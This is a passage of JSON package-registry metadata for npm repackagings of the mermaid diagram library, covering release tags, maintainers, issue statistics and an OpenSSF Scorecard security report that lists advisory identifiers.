":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.517Z","dependent_packages_count":0,"downloads":6,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":33.35981289358473,"dependent_packages_count":47.757943799664574,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.55887834662465},"purl":"pkg:npm/%40eten-lab/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@eten-lab/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@eten-lab/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@eten-lab/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@eten-lab%2Fmermaid/related_packages","maintainers":[{"uuid":"hiroshit","login":"hiroshit","name":null,"email":"hiroshi.tan57@gmail.com","url":null,"packages_count":14,"html_url":"https://www.npmjs.com/~hiroshit","role":null,"created_at":"2024-02-27T22:34:12.465Z","updated_at":"2024-02-27T22:34:12.465Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/hiroshit/packages"},{"uuid":"etenlab","login":"etenlab","name":null,"email":"admin@lab.eten.bible","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~etenlab","role":null,"created_at":"2024-02-27T22:34:12.503Z","updated_at":"2024-02-27T22:34:12.503Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/etenlab/packages"},{"uuid":"cwshkut","login":"cwshkut","name":null,"email":"alexey.shkut@clockwise.software","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~cwshkut","role":null,"created_at":"2024-02-27T22:34:12.388Z","updated_at":"2024-02-27T22:34:12.388Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/cwshkut/packages"},{"uuid":"daniel-leod","login":"daniel-leod","name":null,"email":"danielld707@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~daniel-leod","role":null,"created_at":"2024-02-27T22:34:12.343Z","updated_at":"2024-02-27T22:34:12.343Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/daniel-leod/packages"},{"uuid":"foreveryoung12","login":"foreveryoung12","name":null,"email":"siafin2010@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~foreveryoung12","role":null,"created_at":"2024-02-27T22:34:12.297Z","updated_at":"2024-02-27T22:34:12.297Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/foreveryoung12/packages"},{"uuid":"0xle0x","login":"0xle0x","name":null,"email":"devgru0114@gmail.com","url":null,"packages_count":9,"html_url":"https://www.npmjs.com/~0xle0x","role":null,"created_at":"2024-02-27T22:34:12.261Z","updated_at":"2024-02-27T22:34:12.261Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/0xle0x/packages"},{"uuid":"aslambabu","login":"aslambabu","name":null,"email":"aslambabu@gmail.com","url":null,"packages_count":7,"html_url":"https://www.npmjs.com/~aslambabu","role":null,"created_at":"2024-02-27T22:34:12.225Z","updated_at":"2024-02-27T22:34:12.225Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aslambabu/packages"},{"uuid":"takeshisuz","login":"takeshisuz","name":null,"email":"takeshisuz57@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~takeshisuz","role":null,"created_at":"2024-02-27T22:34:12.189Z","updated_at":"2024-02-27T22:34:12.189Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/takeshisuz/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":10083482,"name":"better-mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph","mindmap","packet diagram","c4 diagram","er diagram","pie chart","pie diagram","quadrant chart","requirement diagram","graph"],"namespace":null,"versions_count":5,"first_release_published_at":"2024-05-23T14:08:13.043Z","latest_release_published_at":"2024-10-30T08:04:44.774Z","latest_release_number":"11.0.0-alpha.11","last_synced_at":"2025-09-01T12:55:58.464Z","created_at":"2024-05-24T02:59:44.758Z","updated_at":"2025-09-01T14:17:50.948Z","registry_url":"https://www.npmjs.com/package/better-mermaid","install_command":"npm install better-mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"11.0.0-alpha.11"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-